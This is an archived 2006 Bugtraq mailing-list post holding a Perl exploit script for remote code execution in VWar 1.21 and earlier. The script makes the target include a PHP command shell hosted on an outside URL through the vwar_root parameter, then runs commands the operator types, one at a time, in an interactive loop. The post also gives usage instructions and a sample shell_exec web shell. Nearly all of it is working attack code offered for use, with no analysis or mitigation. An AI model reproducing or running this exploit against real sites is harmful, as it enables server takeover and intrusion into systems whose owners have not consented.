| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060422154859.12201.qmail@securityfocus.com>
Date: 22 Apr 2006 15:48:59 -0000
From: ali@...kerz.ir
To: bugtraq@...urityfocus.com
Subject: VWar <= ver 1.21 Remote Code Execution Exploit
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx ,sattar.li , stanic, mfox,blood moon and..
######################################################
# ___ ___ __ #
# / | \_____ ____ | | __ ___________________ #
#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #
#\ Y // __ \\ \___| <\ ___/| | \// / #
# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ #
# \/ \/ \/ \/ \/ \/ #
# Iran Hackerz Security Team #
# WebSite: www.hackerz.ir #
######################################################
# VWar <= ver 1.21 Remote Code Execution Exploit #
# usage: >>>> #
# perl vwar.pl +location of VWar+ +shell Url+ #
# location example :http://raeget/modules/vwar/admin #
# cmd shell example: <?shell_exec($_GET[cmd]);?> #
######################################################
use LWP::Simple;
print "-------------------------------------------\n";
print "= vwar Exploit BY s3rv3r_hack3r =\n";
print "= IHST (WwW.hackerz.ir) =\n";
print"-------------------------------------------\n\n";
$targ = $ARGV[0];
$cmdurl = $ARGV[1];
$con=get("http://".$targ) || die "[-]Cannot connect to Host";
while ()
{
print "Cmd@...T |\$";
chomp($cmd=<STDIN>);
$commd=get("http://".$targ."/admin.php?vwar_root=".$cmdurl."&cmd=".$cmd)
}
Powered by blists - more mailing lists